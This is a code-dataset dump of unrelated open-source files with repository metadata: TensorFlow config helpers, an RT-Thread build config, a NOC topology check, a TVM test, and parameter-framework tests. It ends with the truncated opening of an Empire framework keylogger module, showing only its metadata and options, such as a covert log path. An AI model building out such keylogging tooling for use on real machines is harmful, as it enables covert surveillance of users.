model = model_config.faster_rcnn
classification_loss = model.second_stage_classification_loss
elif meta_architecture == "ssd":
model = model_config.ssd
classification_loss = model.loss.classification_loss
else:
raise TypeError("Did not recognize the model architecture.")
return classification_loss
def _update_focal_loss_gamma(configs, gamma):
"""Updates the gamma value for a sigmoid focal loss.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
gamma: Exponent term in focal loss.
Raises:
TypeError: If the classification loss is not `weighted_sigmoid_focal`.
"""
classification_loss = _get_classification_loss(configs["model"])
classification_loss_type = classification_loss.WhichOneof(
"classification_loss")
if classification_loss_type != "weighted_sigmoid_focal":
raise TypeError("Classification loss must be `weighted_sigmoid_focal`.")
classification_loss.weighted_sigmoid_focal.gamma = gamma
def _update_focal_loss_alpha(configs, alpha):
"""Updates the alpha value for a sigmoid focal loss.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
alpha: Class weight multiplier for sigmoid loss.
Raises:
TypeError: If the classification loss is not `weighted_sigmoid_focal`.
"""
classification_loss = _get_classification_loss(configs["model"])
classification_loss_type = classification_loss.WhichOneof(
"classification_loss")
if classification_loss_type != "weighted_sigmoid_focal":
raise TypeError("Classification loss must be `weighted_sigmoid_focal`.")
classification_loss.weighted_sigmoid_focal.alpha = alpha
def _update_train_steps(configs, train_steps):
"""Updates `configs` to reflect new number of training steps."""
configs["train_config"].num_steps = int(train_steps)
def _update_all_eval_input_configs(configs, field, value):
"""Updates the content of `field` with `value` for all eval input configs."""
for eval_input_config in configs["eval_input_configs"]:
setattr(eval_input_config, field, value)
def _update_label_map_path(configs, label_map_path):
"""Updates the label map path for both train and eval input readers.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
label_map_path: New path to `StringIntLabelMap` pbtxt file.
"""
configs["train_input_config"].label_map_path = label_map_path
_update_all_eval_input_configs(configs, "label_map_path", label_map_path)
def _update_mask_type(configs, mask_type):
"""Updates the mask type for both train and eval input readers.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
mask_type: A string name representing a value of
input_reader_pb2.InstanceMaskType
"""
configs["train_input_config"].mask_type = mask_type
_update_all_eval_input_configs(configs, "mask_type", mask_type)
def _update_use_moving_averages(configs, use_moving_averages):
"""Updates the eval config option to use or not use moving averages.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
use_moving_averages: Boolean indicating whether moving average variables
should be loaded during evaluation.
"""
configs["eval_config"].use_moving_averages = use_moving_averages
def _update_retain_original_images(eval_config, retain_original_images):
"""Updates eval config with option to retain original images.
The eval_config object is updated in place, and hence not returned.
Args:
eval_config: A eval_pb2.EvalConfig.
retain_original_images: Boolean indicating whether to retain original images
in eval mode.
"""
eval_config.retain_original_images = retain_original_images
def _update_use_bfloat16(configs, use_bfloat16):
"""Updates `configs` to reflect the new setup on whether to use bfloat16.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
use_bfloat16: A bool, indicating whether to use bfloat16 for training.
"""
configs["train_config"].use_bfloat16 = use_bfloat16
def _update_retain_original_image_additional_channels(
eval_config,
retain_original_image_additional_channels):
"""Updates eval config to retain original image additional channels or not.
The eval_config object is updated in place, and hence not returned.
Args:
eval_config: A eval_pb2.EvalConfig.
retain_original_image_additional_channels: Boolean indicating whether to
retain original image additional channels in eval mode.
"""
eval_config.retain_original_image_additional_channels = (
retain_original_image_additional_channels)
def remove_unnecessary_ema(variables_to_restore, no_ema_collection=None):
"""Remap and Remove EMA variable that are not created during training.
ExponentialMovingAverage.variables_to_restore() returns a map of EMA names
to tf variables to restore. E.g.:
{
conv/batchnorm/gamma/ExponentialMovingAverage: conv/batchnorm/gamma,
conv_4/conv2d_params/ExponentialMovingAverage: conv_4/conv2d_params,
global_step: global_step
}
This function takes care of the extra ExponentialMovingAverage variables
that get created during eval but aren't available in the checkpoint, by
remapping the key to the variable itself, and remove the entry of its EMA from
the variables to restore. An example resulting dictionary would look like:
{
conv/batchnorm/gamma: conv/batchnorm/gamma,
conv_4/conv2d_params: conv_4/conv2d_params,
global_step: global_step
}
Args:
variables_to_restore: A dictionary created by ExponentialMovingAverage.
variables_to_restore().
no_ema_collection: A list of namescope substrings to match the variables
to eliminate EMA.
Returns:
A variables_to_restore dictionary excluding the collection of unwanted
EMA mapping.
"""
if no_ema_collection is None:
return variables_to_restore
restore_map = {}
for key in variables_to_restore:
if ("ExponentialMovingAverage" in key
and any([name in key for name in no_ema_collection])):
new_key = key.replace("/ExponentialMovingAverage", "")
else:
new_key = key
restore_map[new_key] = variables_to_restore[key]
return restore_map
def _update_num_classes(model_config, num_classes):
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "faster_rcnn":
model_config.faster_rcnn.num_classes = num_classes
if meta_architecture == "ssd":
model_config.ssd.num_classes = num_classes
def _update_sample_from_datasets_weights(input_reader_config, weights):
"""Updated sample_from_datasets_weights with overrides."""
if len(weights) != len(input_reader_config.sample_from_datasets_weights):
raise ValueError(
"sample_from_datasets_weights override has a different number of values"
" ({}) than the configured dataset weights ({})."
.format(
len(input_reader_config.sample_from_datasets_weights),
len(weights)))
del input_reader_config.sample_from_datasets_weights[:]
input_reader_config.sample_from_datasets_weights.extend(weights)
def _update_peak_max_pool_kernel_size(model_config, kernel_size):
"""Updates the max pool kernel size (NMS) for keypoints in CenterNet."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.peak_max_pool_kernel_size = kernel_size
else:
tf.logging.warning("Ignoring config override key for "
"peak_max_pool_kernel_size since there are multiple "
"keypoint estimation tasks")
def _update_candidate_search_scale(model_config, search_scale):
"""Updates the keypoint candidate search scale in CenterNet."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.candidate_search_scale = search_scale
else:
tf.logging.warning("Ignoring config override key for "
"candidate_search_scale since there are multiple "
"keypoint estimation tasks")
def _update_candidate_ranking_mode(model_config, mode):
"""Updates how keypoints are snapped to candidates in CenterNet."""
if mode not in ("min_distance", "score_distance_ratio",
"score_scaled_distance_ratio", "gaussian_weighted"):
raise ValueError("Attempting to set the keypoint candidate ranking mode "
"to {}, but the only options are 'min_distance', "
"'score_distance_ratio', 'score_scaled_distance_ratio', "
"'gaussian_weighted'.".format(mode))
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.candidate_ranking_mode = mode
else:
tf.logging.warning("Ignoring config override key for "
"candidate_ranking_mode since there are multiple "
"keypoint estimation tasks")
def _update_score_distance_offset(model_config, offset):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.score_distance_offset = offset
else:
tf.logging.warning("Ignoring config override key for "
"score_distance_offset since there are multiple "
"keypoint estimation tasks")
def _update_box_scale(model_config, box_scale):
"""Updates the keypoint candidate search region. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.box_scale = box_scale
else:
tf.logging.warning("Ignoring config override key for box_scale since "
"there are multiple keypoint estimation tasks")
def _update_keypoint_candidate_score_threshold(model_config, threshold):
"""Updates the keypoint candidate score threshold. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.keypoint_candidate_score_threshold = threshold
else:
tf.logging.warning("Ignoring config override key for "
"keypoint_candidate_score_threshold since there are "
"multiple keypoint estimation tasks")
def _update_rescore_instances(model_config, should_rescore):
"""Updates whether boxes should be rescored based on keypoint confidences."""
if isinstance(should_rescore, str):
should_rescore = True if should_rescore == "True" else False
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.rescore_instances = should_rescore
else:
tf.logging.warning("Ignoring config override key for "
"rescore_instances since there are multiple keypoint "
"estimation tasks")
def _update_unmatched_keypoint_score(model_config, score):
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.unmatched_keypoint_score = score
else:
tf.logging.warning("Ignoring config override key for "
"unmatched_keypoint_score since there are multiple "
"keypoint estimation tasks")
def _update_score_distance_multiplier(model_config, score_distance_multiplier):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.score_distance_multiplier = score_distance_multiplier
else:
tf.logging.warning("Ignoring config override key for "
"score_distance_multiplier since there are multiple "
"keypoint estimation tasks")
else:
raise ValueError(
"Unsupported meta_architecture type: %s" % meta_architecture)
def _update_std_dev_multiplier(model_config, std_dev_multiplier):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.std_dev_multiplier = std_dev_multiplier
else:
tf.logging.warning("Ignoring config override key for "
"std_dev_multiplier since there are multiple "
"keypoint estimation tasks")
else:
raise ValueError(
"Unsupported meta_architecture type: %s" % meta_architecture)
def _update_rescoring_threshold(model_config, rescoring_threshold):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.rescoring_threshold = rescoring_threshold
else:
tf.logging.warning("Ignoring config override key for "
"rescoring_threshold since there are multiple "
"keypoint estimation tasks")
else:
raise ValueError(
"Unsupported meta_architecture type: %s" % meta_architecture)
| 41.357704
| 81
| 0.729485
|
bfa1a160f12e69c398b1015d1dbf25f17e847797
| 2,499
|
py
|
Python
|
bsp/nrf5x/nrf51822/rtconfig.py
|
rockonedege/rt-thread
|
4fe6c709d0bfe719bed6c927f0144ba373bbda5a
|
[
"Apache-2.0"
] | 7,482
|
2015-01-01T09:23:08.000Z
|
2022-03-31T19:34:05.000Z
|
bsp/nrf5x/nrf51822/rtconfig.py
|
ArdaFu/rt-thread
|
eebb2561ec166e0016187c7b7998ada4f8212b3a
|
[
"Apache-2.0"
] | 2,543
|
2015-01-09T02:01:34.000Z
|
2022-03-31T23:10:14.000Z
|
bsp/nrf5x/nrf51822/rtconfig.py
|
ArdaFu/rt-thread
|
eebb2561ec166e0016187c7b7998ada4f8212b3a
|
[
"Apache-2.0"
] | 4,645
|
2015-01-06T07:05:31.000Z
|
2022-03-31T18:21:50.000Z
|
import os
# toolchains options
ARCH='arm'
CPU='cortex-m0'
CROSS_TOOL='keil'
if os.getenv('RTT_CC'):
CROSS_TOOL = os.getenv('RTT_CC')
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = 'D:/SourceryGCC/bin'
elif CROSS_TOOL == 'keil':
PLATFORM = 'armcc'
EXEC_PATH = 'C:/Keil_v5'
elif CROSS_TOOL == 'iar':
print('================ERROR============================')
print('Not support iar yet!')
print('=================================================')
exit(0)
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
BUILD = 'debug'
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'arm-none-eabi-'
CC = PREFIX + 'gcc'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu='+CPU + ' -mthumb -ffunction-sections -fdata-sections'
CFLAGS = DEVICE
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
LFLAGS = DEVICE + ' -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,Reset_Handler -T board/linker_scripts/link.lds'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
elif PLATFORM == 'armcc':
# toolchains
CC = 'armcc'
AS = 'armasm'
AR = 'armar'
LINK = 'armlink'
TARGET_EXT = 'axf'
DEVICE = ' --device DARMSTM'
CFLAGS = DEVICE + ' --apcs=interwork'
AFLAGS = DEVICE
LFLAGS = DEVICE + ' --info sizes --info totals --info unused --info veneers --list rtthread.map --scatter "board\linker_scripts\link.sct"'
CFLAGS += ' --c99'
CFLAGS += ' -I' + EXEC_PATH + '/ARM/RV31/INC'
LFLAGS += ' --libpath ' + EXEC_PATH + '/ARM/RV31/LIB'
EXEC_PATH += '/arm/bin40/'
if BUILD == 'debug':
CFLAGS += ' -g -O0'
AFLAGS += ' -g'
else:
CFLAGS += ' -O2'
POST_ACTION = 'fromelf --bin $TARGET --output rtthread.bin \nfromelf -z $TARGET'
def dist_handle(BSP_ROOT, dist_dir):
import sys
cwd_path = os.getcwd()
sys.path.append(os.path.join(os.path.dirname(BSP_ROOT), 'tools'))
from sdk_dist import dist_do_building
dist_do_building(BSP_ROOT, dist_dir)
| 26.870968
| 142
| 0.57503
|
17ad4871feefea07c0740a488d99ba8c0d14ba9b
| 923
|
py
|
Python
|
services/discovery/jobs/box/huawei_ndp.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
services/discovery/jobs/box/huawei_ndp.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
services/discovery/jobs/box/huawei_ndp.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ---------------------------------------------------------------------
# Huawei NDP check
# ---------------------------------------------------------------------
# Copyright (C) 2007-2016 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.services.discovery.jobs.base import TopologyDiscoveryCheck
class HuaweiNDPCheck(TopologyDiscoveryCheck):
"""
CDP Topology discovery
"""
name = "huawei_ndp"
required_script = "get_huawei_ndp_neighbors"
required_capabilities = ["Huawei | NDP"]
def iter_neighbors(self, mo):
for n in mo.scripts.get_huawei_ndp_neighbors():
if len(n["neighbors"]) == 1:
nn = n["neighbors"][0]
yield (n["local_interface"], nn["chassis_mac"], nn["interface"])
def get_neighbor(self, n):
return self.get_neighbor_by_mac(n)
| 31.827586
| 80
| 0.503792
|
c38271e0ec98c779f1755c0ae3e7f40538620917
| 2,248
|
py
|
Python
|
tests/test_analysis_get_calibration_data.py
|
anonymousWork000/TVMfuzz
|
0ccbb33af89758b8ead59a8c686645246ccd0545
|
[
"Apache-2.0"
] | 16
|
2021-05-22T07:39:53.000Z
|
2022-02-23T14:50:38.000Z
|
tests/test_analysis_get_calibration_data.py
|
anonymousWork000/TVMfuzz
|
0ccbb33af89758b8ead59a8c686645246ccd0545
|
[
"Apache-2.0"
] | null | null | null |
tests/test_analysis_get_calibration_data.py
|
anonymousWork000/TVMfuzz
|
0ccbb33af89758b8ead59a8c686645246ccd0545
|
[
"Apache-2.0"
] | 3
|
2021-05-28T07:12:14.000Z
|
2021-11-28T02:10:48.000Z
|
import numpy as np
import tvm
import tvm.relay.testing
from tvm import relay
from tvm.relay import transform
from tvm.relay.analysis import get_calibration_data
def check_data_size(mod, data):
assert len(data) == len(mod.functions) - 1
for key, value in mod.functions.items():
if key.name_hint != "main":
assert len(data[key]["inputs"]) == len(value.params)
if isinstance(value.body, relay.Tuple):
assert len(data[key]["outputs"]) == len(value.body.fields)
else:
assert len(data[key]["outputs"]) == 1
def test_simple_graph():
# A module with two subgraphs
mod = tvm.IRModule()
x0 = relay.var("x0", shape=(8, 8))
y0 = relay.var("y0", shape=(8, 8))
z0 = x0 + y0
z1 = x0 - y0
z2 = relay.Tuple((z0, z1))
f0 = relay.Function([x0, y0], z2)
f0 = f0.with_attr("Compiler", "test_graph")
g0 = relay.GlobalVar("g0")
mod[g0] = f0
x1 = relay.var("x1", shape=(8, 8))
y1 = relay.var("y1", shape=(8, 8))
z1 = x1 - y1
f1 = relay.Function([x1, y1], z1)
f1 = f1.with_attr("Compiler", "test_graph")
g1 = relay.GlobalVar("g1")
mod[g1] = f1
x = relay.var("x", shape=(8, 8))
y = relay.var("y", shape=(8, 8))
z = relay.var("z", shape=(8, 8))
c0 = relay.Call(g0, [x, y])
c1 = relay.Call(g1, [relay.TupleGetItem(c0, 0), z])
fm = relay.Function([x, y, z], c1)
mod["main"] = fm
x_data = np.random.rand(8, 8).astype("float32")
y_data = np.random.rand(8, 8).astype("float32")
z_data = np.random.rand(8, 8).astype("float32")
data = get_calibration_data(mod, {"x": x_data, "y": y_data, "z": z_data})
# Check the number and orders
check_data_size(mod, data)
def test_mobilenet_dnnl():
# if not tvm.get_global_func("relay.ext.dnnl", True):
# print("skip because DNNL codegen is not available")
# return
dtype = "float32"
ishape = (1, 3, 224, 224)
mod, params = relay.testing.mobilenet.get_workload(batch_size=1, dtype="float32")
mod = transform.AnnotateTarget(["dnnl"])(mod)
mod = transform.MergeCompilerRegions()(mod)
mod = transform.PartitionGraph()(mod)
i_data = np.random.uniform(0, 1, ishape).astype(dtype)
| 30.794521
| 85
| 0.601423
|
f927cdaa9a9342d8e13c04314a6033dd7b28485a
| 10,631
|
py
|
Python
|
test/functional-tests/PfwTestCase/Types/tINT16.py
|
MIPS/external-parameter-framework
|
7f346c9058f39a533a2eaadc9ebc4001397c6ff9
|
[
"BSD-3-Clause"
] | null | null | null |
test/functional-tests/PfwTestCase/Types/tINT16.py
|
MIPS/external-parameter-framework
|
7f346c9058f39a533a2eaadc9ebc4001397c6ff9
|
[
"BSD-3-Clause"
] | null | null | null |
test/functional-tests/PfwTestCase/Types/tINT16.py
|
MIPS/external-parameter-framework
|
7f346c9058f39a533a2eaadc9ebc4001397c6ff9
|
[
"BSD-3-Clause"
] | null | null | null |
# -*-coding:utf-8 -*
# Copyright (c) 2011-2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Integer parameter type testcases - INT16
List of tested functions :
--------------------------
- [setParameter] function
- [getParameter] function
Initial Settings :
------------------
INT16 :
- size = 16
- range : [-1000, 1000]
Test cases :
------------
- INT16 parameter min value = -1000
- INT16 parameter min value out of bounds = -1001
- INT16 parameter max value = 1000
- INT16 parameter max value out of bounds = 1001
- INT16 parameter in nominal case = 50
"""
import commands
from Util.PfwUnitTestLib import PfwTestCase
from Util import ACTLogging
log=ACTLogging.Logger()
# Test of type INT16 - range [-1000, 1000]
class TestCases(PfwTestCase):
def setUp(self):
self.param_name = "/Test/Test/TEST_DIR/INT16"
self.pfw.sendCmd("setTuningMode", "on")
def tearDown(self):
self.pfw.sendCmd("setTuningMode", "off")
def test_Nominal_Case(self):
"""
Testing INT16 in nominal case = 50
----------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 parameter in nominal case = 50
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- INT16 parameter set to 50
- Blackboard and filesystem values checked
"""
log.D(self.test_Nominal_Case.__doc__)
log.I("INT16 parameter in nominal case = 50")
value = "50"
hex_value = "0x32"
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == "Done", log.F("when setting parameter %s : %s"
% (self.param_name, out))
#Check parameter value on blackboard
out, err = self.pfw.sendCmd("getParameter", self.param_name, "")
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == value, log.F("BLACKBOARD : Incorrect value for %s, expected: %s, found: %s"
% (self.param_name, value, out))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == hex_value, log.F("FILESYSTEM : parameter update error")
log.I("test OK")
def test_TypeMin(self):
"""
Testing INT16 minimal value = -1000
-----------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 parameter min value = -1000
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- INT16 parameter set to -1000
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMin.__doc__)
log.I("INT16 parameter min value = -1000")
value = "-1000"
hex_value = "0xfc18"
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == "Done", log.F("when setting parameter %s : %s"
% (self.param_name, out))
#Check parameter value on blackboard
out, err = self.pfw.sendCmd("getParameter", self.param_name, "")
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == value, log.F("BLACKBOARD : Incorrect value for %s, expected: %s, found: %s"
% (self.param_name, value, out))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == hex_value, log.F("FILESYSTEM : parameter update error")
log.I("test OK")
def test_TypeMin_Overflow(self):
"""
Testing INT16 parameter value out of negative range
---------------------------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 to -1001
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- error detected
- INT16 parameter not updated
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMin_Overflow.__doc__)
log.I("INT16 parameter min value out of bounds = -1001")
value = "-1001"
param_check = commands.getoutput('cat $PFW_RESULT/INT16')
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out != "Done", log.F("PFW : Error not detected when setting parameter %s out of bounds"
% (self.param_name))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == param_check, log.F("FILESYSTEM : Forbiden parameter change")
log.I("test OK")
def test_TypeMax(self):
"""
Testing INT16 parameter maximum value
-------------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 to 1000
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- INT16 parameter set to 1000
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMax.__doc__)
log.I("INT16 parameter max value = 1000")
value = "1000"
hex_value = "0x3e8"
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == "Done", log.F("when setting parameter %s : %s"
% (self.param_name, out))
#Check parameter value on blackboard
out, err = self.pfw.sendCmd("getParameter", self.param_name, "")
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out == value, log.F("BLACKBOARD : Incorrect value for %s, expected: %s, found: %s"
% (self.param_name, value, out))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == hex_value, log.F("FILESYSTEM : parameter update error")
log.I("test OK")
def test_TypeMax_Overflow(self):
"""
Testing INT16 parameter value out of positive range
---------------------------------------------------
Test case description :
~~~~~~~~~~~~~~~~~~~~~~~
- set INT16 to 1001
Tested commands :
~~~~~~~~~~~~~~~~~
- [setParameter] function
Used commands :
~~~~~~~~~~~~~~~
- [getParameter] function
Expected result :
~~~~~~~~~~~~~~~~~
- error detected
- INT16 parameter not updated
- Blackboard and filesystem values checked
"""
log.D(self.test_TypeMax_Overflow.__doc__)
log.I("INT16 parameter max value out of bounds = 1001")
value = "1001"
param_check = commands.getoutput('cat $PFW_RESULT/INT16')
#Set parameter value
out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
assert err == None, log.E("when setting parameter %s : %s"
% (self.param_name, err))
assert out != "Done", log.F("PFW : Error not detected when setting parameter %s out of bounds"
% (self.param_name))
#Check parameter value on filesystem
assert commands.getoutput('cat $PFW_RESULT/INT16') == param_check, log.F("FILESYSTEM : Forbiden parameter change")
log.I("test OK")
| 43.215447
| 122
| 0.541529
|
c5b334b27b40d91c535594a2cca4c022b88d11b9
| 7,627
|
py
|
Python
|
lib/modules/python/collection/linux/keylogger.py
|
Gui-Luz/Empire
|
6f5eeff5f46dd085e1317cb09b39853a2fce5d13
|
[
"BSD-3-Clause"
] | 5,720
|
2017-02-02T13:59:40.000Z
|
2022-03-31T09:50:10.000Z
|
lib/modules/python/collection/linux/keylogger.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 866
|
2017-02-02T10:56:31.000Z
|
2020-01-17T07:47:05.000Z
|
lib/modules/python/collection/linux/keylogger.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 2,181
|
2017-02-04T10:28:41.000Z
|
2022-03-31T04:36:56.000Z
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Webcam',
# list of one or more authors for the module
'Author': ['joev', '@harmj0y'],
# more verbose multi-line description of the module
'Description': ("Logs keystrokes to the specified file. Ruby based and heavily adapted from MSF's osx/capture/keylog_recorder. Kill the resulting PID when keylogging is finished and download the specified LogFile."),
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
'OutputExtension': "",
# if the module needs administrative privileges
'NeedsAdmin': False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
"https://github.com/amoffat/pykeylogger"
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to keylog.',
'Required' : True,
'Value' : ''
},
'LogFile': {
'Description' : 'Text file to log keystrokes out to.',
'Required' : True,
'Value' : '/tmp/debug.db'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
